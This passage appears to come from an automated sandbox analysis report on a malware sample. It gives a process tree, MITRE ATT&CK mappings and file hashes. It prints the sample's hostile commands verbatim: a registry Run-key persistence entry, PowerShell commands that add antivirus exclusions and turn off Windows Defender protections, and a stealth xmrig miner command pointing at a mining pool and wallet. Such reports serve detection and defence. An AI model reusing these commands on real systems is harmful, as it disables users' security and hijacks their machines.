                                                                                                                      C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                      3⤵
                                                                                                                        PID:4304
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                          4⤵
                                                                                                                            PID:4332
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                            4⤵
                                                                                                                              PID:4324
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                            3⤵
                                                                                                                              PID:4880
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                4⤵
                                                                                                                                  PID:4356
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                  4⤵
                                                                                                                                    PID:4348
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      CMD /C CALL echo y
                                                                                                                                      5⤵
                                                                                                                                        PID:4524
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                    3⤵
                                                                                                                                      PID:4184
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                        4⤵
                                                                                                                                          PID:4436
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            CMD /C CALL echo y
                                                                                                                                            5⤵
                                                                                                                                              PID:4432
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                            4⤵
                                                                                                                                              PID:4440
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                            3⤵
                                                                                                                                              PID:4992
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:4364
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4460
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      CMD /C CALL echo y
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4500
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5424
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrWRoY.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\lrWRoY.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:2232
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2196
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 252
                                                                                                                                                        3⤵
                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                        • Program crash
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:4076
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\56BD.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\56BD.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:1584
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2084
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName facebook.com
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3704
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
                                                                                                                                                          2⤵
                                                                                                                                                            PID:648
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4680
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4704
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName outlook.com
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4812
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName bing.com
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5896
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\59BC.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\59BC.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2040
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C powershell Add-MpPreference -ExclusionExtension .exe -Force
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:3640
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell Add-MpPreference -ExclusionExtension .exe -Force
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4220
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "powershell" Get-MpPreference -verbose
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5012
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2064
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4472
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4972
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4424
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4668
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4748
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5124
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5224
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5276
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5140
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4500
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5344
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\xmrig.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\xmrig.exe" --cinit-find-x -B --log-file=SIDMQQV350R7LM24X7PSRJPPFXRYITGDNA7E2GM6V2ZUQN.txt --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=46N5zSuWXZxEL9R15g1BxDKTjKxqYJghY6BoGAF6TxkqJrpxeqyfWAqjawsQgUT3tx8PyTuZRdiL6CCAY5QAJqi9JGa6Rr9 --pass=XMR Miner --cpu-max-threads-hint=50 --cinit-stealth-targets="Wi4AbZOHTuCRnu5j9xZIAA==" --cinit-idle-wait=10 --cinit-idle-cpu=90 --cinit-stealth
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5956
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  CMD /C CALL echo y
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4348

                                                                                                                                                                                                  Network

                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1031

                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1060

                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                  3
                                                                                                                                                                                                  T1112

                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1089

                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1497

                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1130

                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1081

                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                  4
                                                                                                                                                                                                  T1012

                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1497

                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                  4
                                                                                                                                                                                                  T1082

                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1120

                                                                                                                                                                                                  Collection

                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1005

                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    8592ba100a78835a6b94d5949e13dfc1

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F437.exe.log
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    461f0608537292fe791c6da4915da916

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    c1a6bd0947a5d3caf43beecf06dba8f3f7e3a713

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    8c261dd43dcd01d55cba35e1537e1a5f81f4cbc0793955ec8bdabc9b8735765e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    e99236b37477d668f3aceaa212d271c0df30f60275987d88c9e9393e6f7f17e8d3ecd5043f1ac884767b966c594af5995e17490268d899b1a0c0b5ae7fd0529a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e2c404ffba7b266e966ebef6d5a5a979

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    ef1e7f6cf1815fb7fae3b7831f463288cc2277fd

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    79e1dfe3ef487f9e1e676cd1d2cf91379c76e6f39a8fc08f2c3309212abaeb82

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5a239caf95f6fd368d5e30d413c4d21fab72f9b42e61df61383af4d1a5dba64a7a16b8b84bf02b0cbc04f305f6bd6bdc5dc7028838df7de4c449d7a89f2742b6

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\41BD.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    330314bc615bf94b4bb39ee2e864df0f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    026ea1897175d9794866807170d2cdcf80975ef1

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    3efb716657ae07b2b4f46bfa772157f34ba5812d70a4f746060fa19079199108

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    1b31b84d2e69d2c9e3da395efbc0f94679e19f58e92a97b160fc8f3b57744d3d0c06c66524bc2a69975c4d3bc3dea089360f623be3a9f69660261e1255211c03

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\41BD.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    330314bc615bf94b4bb39ee2e864df0f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    026ea1897175d9794866807170d2cdcf80975ef1

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    3efb716657ae07b2b4f46bfa772157f34ba5812d70a4f746060fa19079199108

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    1b31b84d2e69d2c9e3da395efbc0f94679e19f58e92a97b160fc8f3b57744d3d0c06c66524bc2a69975c4d3bc3dea089360f623be3a9f69660261e1255211c03

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\56BD.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    6d6fa1daff7b01f5a55a829c31c4f7a7

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    bf3fb6347c0ddcf164fc86f3d2c7fed29128146e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    4354a498a6955bcd4944179ddb6ba94927022ab4c0eba0266b67911bf82a7b2e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    8f57e8088e647f7f01a8e4d3643ed1df665182acb33198a80412dca8ff3706ed17718c2c837da9809c0f173088d9b7476989685a69c2cffa1c4eb273c45b28b6

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\56BD.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    6d6fa1daff7b01f5a55a829c31c4f7a7

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    bf3fb6347c0ddcf164fc86f3d2c7fed29128146e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    4354a498a6955bcd4944179ddb6ba94927022ab4c0eba0266b67911bf82a7b2e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    8f57e8088e647f7f01a8e4d3643ed1df665182acb33198a80412dca8ff3706ed17718c2c837da9809c0f173088d9b7476989685a69c2cffa1c4eb273c45b28b6

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\59BC.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    4f8a2e059b79d85ba1975282be639456

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    a1dfc07da88e4ce413d782fbaa6dfce0bc9363bc

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    01062c4220cf2d68fc767e8a773857a265e240768b457092c27c23801fd47c53

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    094d56e461ab9be9b2e91f1f1247f8179f01d511f40c83a73d094e01c3da6f46f426e8e7031c0d7efd50bdac5cfc20f18b5fa854375037a1e4bfe06415a4bde6

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\59BC.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    4f8a2e059b79d85ba1975282be639456

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    a1dfc07da88e4ce413d782fbaa6dfce0bc9363bc

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    01062c4220cf2d68fc767e8a773857a265e240768b457092c27c23801fd47c53

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    094d56e461ab9be9b2e91f1f1247f8179f01d511f40c83a73d094e01c3da6f46f426e8e7031c0d7efd50bdac5cfc20f18b5fa854375037a1e4bfe06415a4bde6

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9AAB.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    a1af52e8bd857ef09a91438600cbf4fd

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    055cf8407bf93bce7bc06e1a10aeb28ac2639660

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    7342b8b909ed4b110ee1e254eb815d654a8fc121253980ad78bdf9d1f19f9ec0

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    8e3398b6472fa31b687ab5e75e8c080a680f91c580618fd75b489b9a2a938ee5ec78213f0dd446b78de75be6e9bc3efbb01f22b6ac5099943883ea7d59ce542b

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9AAB.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    a1af52e8bd857ef09a91438600cbf4fd

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    055cf8407bf93bce7bc06e1a10aeb28ac2639660

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    7342b8b909ed4b110ee1e254eb815d654a8fc121253980ad78bdf9d1f19f9ec0

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    8e3398b6472fa31b687ab5e75e8c080a680f91c580618fd75b489b9a2a938ee5ec78213f0dd446b78de75be6e9bc3efbb01f22b6ac5099943883ea7d59ce542b

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    ade9d42b80b677fedae850ff6f535e80

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    19054ca9131f321b515181dedbb12e039202007e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    5f9be13e2915fbdee51e2f44a40449ce3f77a8f20c049c1421cd4bacad7600c0

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    7b871529477376482a96e777b2407714ba3fa176bfa9b1e469c55d323b04a0f9e26b755b59cf54bc951c1a3f7baff87d0c3cee9cf4202e12f7b2c4a6407909e5

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    ade9d42b80b677fedae850ff6f535e80

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    19054ca9131f321b515181dedbb12e039202007e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    5f9be13e2915fbdee51e2f44a40449ce3f77a8f20c049c1421cd4bacad7600c0

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    7b871529477376482a96e777b2407714ba3fa176bfa9b1e469c55d323b04a0f9e26b755b59cf54bc951c1a3f7baff87d0c3cee9cf4202e12f7b2c4a6407909e5

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EFC2.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    cf165d92c316c354aef2078c1ef62eab

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d8311176ec31473bc65d0860f39f7d2ae125cbfb

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    02c4cc1a567916af61dcdfd072ca3e6bc06547a109e186e2f068cab82153f727

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    70389ca92cb016966e077171289a934b9ea1eaabc2209b7709aab9b36490c80b735ed1df33e9df7570894b82783cf2d3c8861a5a6dd4e87c159c4abd7fb7373a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EFC2.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    cf165d92c316c354aef2078c1ef62eab

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d8311176ec31473bc65d0860f39f7d2ae125cbfb

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    02c4cc1a567916af61dcdfd072ca3e6bc06547a109e186e2f068cab82153f727

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    70389ca92cb016966e077171289a934b9ea1eaabc2209b7709aab9b36490c80b735ed1df33e9df7570894b82783cf2d3c8861a5a6dd4e87c159c4abd7fb7373a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F437.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e55c9fa272c78a31a8b849f0e7a8124d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f8a18ded83b0e32aa1092ba84a3e74be8ef24f36

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    e602d93297154e4e382b99762aafae44d90fc2f37d16654748c4e17a8e1c2905

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    d2e2dddd6cf5e4e50ee7d4a68a86b175dc5b1250a84cb344884c252c44f0c53cc70ea7f484cfd57af8737fc8bd2bb03845cfebdbc167210bb44221b097f09ba4

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F437.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e55c9fa272c78a31a8b849f0e7a8124d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f8a18ded83b0e32aa1092ba84a3e74be8ef24f36

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    e602d93297154e4e382b99762aafae44d90fc2f37d16654748c4e17a8e1c2905

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    d2e2dddd6cf5e4e50ee7d4a68a86b175dc5b1250a84cb344884c252c44f0c53cc70ea7f484cfd57af8737fc8bd2bb03845cfebdbc167210bb44221b097f09ba4

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F437.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e55c9fa272c78a31a8b849f0e7a8124d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f8a18ded83b0e32aa1092ba84a3e74be8ef24f36

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    e602d93297154e4e382b99762aafae44d90fc2f37d16654748c4e17a8e1c2905

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    d2e2dddd6cf5e4e50ee7d4a68a86b175dc5b1250a84cb344884c252c44f0c53cc70ea7f484cfd57af8737fc8bd2bb03845cfebdbc167210bb44221b097f09ba4

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F437.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e55c9fa272c78a31a8b849f0e7a8124d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f8a18ded83b0e32aa1092ba84a3e74be8ef24f36

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    e602d93297154e4e382b99762aafae44d90fc2f37d16654748c4e17a8e1c2905

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    d2e2dddd6cf5e4e50ee7d4a68a86b175dc5b1250a84cb344884c252c44f0c53cc70ea7f484cfd57af8737fc8bd2bb03845cfebdbc167210bb44221b097f09ba4

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F437.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e55c9fa272c78a31a8b849f0e7a8124d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f8a18ded83b0e32aa1092ba84a3e74be8ef24f36

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    e602d93297154e4e382b99762aafae44d90fc2f37d16654748c4e17a8e1c2905

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    d2e2dddd6cf5e4e50ee7d4a68a86b175dc5b1250a84cb344884c252c44f0c53cc70ea7f484cfd57af8737fc8bd2bb03845cfebdbc167210bb44221b097f09ba4

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FB5C.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    034466d9b273d7f48bb4b207e8d76bb2

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8a1e939b8aee7cc884dd3abaa94c30d8dbb15253

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    16e0e3b9c0694ae4927f8ece6c71140e661378131300cd0bd97f4bc35d2bd54d

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    68f096315d4f9c738e389a83def1958758b80a88473292338dbf7c8a6ede75e3d93fb8a34b0e6860005e1ae14f23073eea829f1dca148d5804c380841fce353b

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FB5C.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    034466d9b273d7f48bb4b207e8d76bb2

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8a1e939b8aee7cc884dd3abaa94c30d8dbb15253

                                                                                                                                                                                                    SHA256

